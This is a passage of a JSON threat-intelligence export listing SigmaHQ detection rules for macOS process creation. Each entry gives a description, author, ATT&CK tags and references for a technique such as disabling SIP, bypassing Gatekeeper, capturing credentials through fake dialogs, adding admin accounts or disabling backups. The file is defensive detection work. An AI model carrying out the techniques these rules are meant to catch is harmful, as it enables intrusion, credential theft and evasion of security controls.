"https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md", "https://www.loobins.io/binaries/xattr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.001" ] }, "related": [ { "dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "value": "Gatekeeper Bypass via Xattr" }, { "description": "Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_csrutil_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/csrutil.html", "https://objective-see.org/blog/blog_0x6D.html", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3603f18a-ec15-43a1-9af2-d196c8a7fec6", "value": "System Integrity Protection (SIP) Disabled" }, { "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_find_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85de3a19-b675-4a51-bfc6-b11a5186c971", "value": "Potential Discovery Activity Using Find - MacOS" }, { "description": "Detects potential suspicious run-only executions compiled using OSACompile", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_osacompile_runonly_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/osacompile.html", "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml" ], "tags": [ "attack.t1059.002", "attack.execution" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9d9b652-d8ed-4697-89a2-a1186ee680ac", "value": "OSACompile Run-Only Execution" }, { "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate administrative activity" ], "filename": "proc_creation_macos_system_shutdown_reboot.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", "value": "System Shutdown/Reboot - MacOs" }, { "description": "Detects possible malicious execution of JXA in-memory via OSAScript", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_jxa_in_memory_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml" ], "tags": [ "attack.t1059.002", "attack.t1059.007", "attack.execution" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1408a58-0e94-4165-b80a-da9f96cf6fc3", "value": "JXA In-memory Execution Via OSAScript" }, { "description": "Detects the use of \"ioreg\" which will show I/O Kit registry information.\nThis process is used for system information discovery.\nIt has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_ioreg_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior", "https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior", "https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "value": "System Information Discovery Using Ioreg" }, { "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", "value": "Potential WizardUpdate Malware Infection" }, { "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_network_sniffing.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", "value": "Network Sniffing - MacOs" }, { "description": "Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\nAn attacker can use this to prevent backups from occurring.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_macos_tmutil_disable_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "value": "Time Machine Backup Disabled Via Tmutil - MacOS" }, { "description": "Detects execution of the \"jamf\" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.\n", "meta": { "author": "Jay Pandit", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate use of the JAMF CLI tool by IT support and administrators" ], "filename": "proc_creation_macos_jamf_usage.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" ], "tags": [ "attack.execution" ] }, "uuid": "be2e3a5c-9cc7-4d02-842a-68e9cb26ec49", "value": "JAMF MDM Execution" }, { "description": "Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_dseditgroup_add_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dseditgroup.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d0fdb62-f225-42fb-8402-3dfe64da468a", "value": "User Added To Admin Group Via DseditGroup" }, { "description": "Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-13", "falsepositive": [ "Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious." ], "filename": "proc_creation_macos_launchctl_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/launchctl/", "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md", "https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1569.001", "attack.t1543.001", "attack.t1543.004" ] }, "related": [ { "dest-uuid": "810aa4ad-61c9-49cb-993f-daa06199421d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "value": "Launch Agent/Daemon Execution Via Launchctl" }, { "description": "Detects the execution of the hdiutil utility in order to create a disk image.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-10", "falsepositive": [ "Legitimate usage of hdiutil by administrators and users." ], "filename": "proc_creation_macos_hdiutil_create.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/hdiutil/", "https://ss64.com/mac/hdiutil.html", "https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "1cf98dc2-fcb0-47c9-8aea-654c9284d1ae", "value": "Disk Image Creation Via Hdiutil - MacOS" }, { "description": "Detects attempts to create and add an account to the admin group via \"sysadminctl\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-03-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_sysadminctl_add_user_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos", "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "652c098d-dc11-4ba6-8566-c20e89042f2b", "value": "User Added To Admin Group Via Sysadminctl" }, { "description": "Detects attempts to use system dialog prompts to capture user credentials", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Legitimate administration tools and activities" ], "filename": "proc_creation_macos_gui_input_capture.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", "value": "GUI Input Capture - macOS" }, { "description": "Detects the use of \"sw_vers\" for system information discovery", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_swvers_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/sw_vers.html", "https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior", "https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5de06a6f-673a-4fc0-8d48-bcfe3837b033", "value": "System Information Discovery Using sw_vers" }, { "description": "Detects potential suspicious child processes of \"jamf\". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly" ], "filename": "proc_creation_macos_jamf_susp_child.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2316929c-01aa-438c-970f-099145ab1ee6", "value": "JAMF MDM Potential Suspicious Child Process" }, { "description": "Detects attempts to create and add an account to the admin group via \"dscl\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-03-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_dscl_add_user_to_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dscl.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml" ], "tags": [ "attack.initial-access", "attack.privilege-escalation", "attack.t1078.003" ] }, "related": [ { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b743623c-2776-40e0-87b1-682b975d0ca5", "value": "User Added To Admin Group Via Dscl" }, { "description": "Detects attempts to enable the root account via \"dsenableroot\"", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_dsenableroot_enable_root_account.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/dsenableroot.html", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" ], "tags": [ "attack.t1078", "attack.t1078.001", "attack.t1078.003", "attack.initial-access", "attack.persistence" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "value": "Root Account Enable Via Dsenableroot" }, { "description": "Detects enumeration of local system groups", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_local_groups.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "value": "Local Groups Discovery - MacOs" }, { "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], "filename": "proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f459ccb4-9805-41ea-b5b2-55e279e2424a", "value": "Remote Access Tool - Team Viewer Session Started On MacOS Host" }, { "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://www.manpagez.com/man/8/firmwarepasswd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "value": "Suspicious MacOS Firmware Activity" }, { "description": "Detects the execution of the hdiutil utility in order to mount disk images.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-10", "falsepositive": [ "Legitimate usage of hdiutil by administrators and users." ], "filename": "proc_creation_macos_hdiutil_mount.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/hdiutil/", "https://ss64.com/mac/hdiutil.html", "https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf241472-f014-4f01-a869-96f99330ca8c", "value": "Disk Image Mounting Via Hdiutil - MacOS" }, { "description": "Detects disabling security tools", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_disable_security_tools.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "value": "Disable Security Tools" }, { "description": "Detects attempts to use screencapture to collect macOS screenshots", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Legitimate user activity taking screenshots" ], "filename": "proc_creation_macos_screencapture.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", "value": "Screen Capture - macOS" }, { "description": "Detect file time attribute change to hide new or changes to existing files", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_change_file_time_attr.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "value": "File Time Attribute Change" }, { "description": "Detects enumeration of local network configuration", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_susp_system_network_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", "value": "System Network Discovery - macOS" }, { "description": "Detects the execution of \"sysctl\" with specific arguments that have been used by threat actors and malware. It provides system hardware information.\nThis process is primarily used to detect and avoid virtualization and analysis environments.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-27", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_sysctl_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.loobins.io/binaries/sysctl/#", "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://evasions.checkpoint.com/techniques/macos.html", "https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior", "https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior", "https://objective-see.org/blog/blog_0x1E.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml" ], "tags": [ "attack.defense-evasion", "attack.t1497.001", "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ff08e55-ea53-4f27-94a1-eff92e6d9d5c", "value": "System Information Discovery Via Sysctl - MacOS" }, { "description": "Detects enumeration of local or remote network services.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": 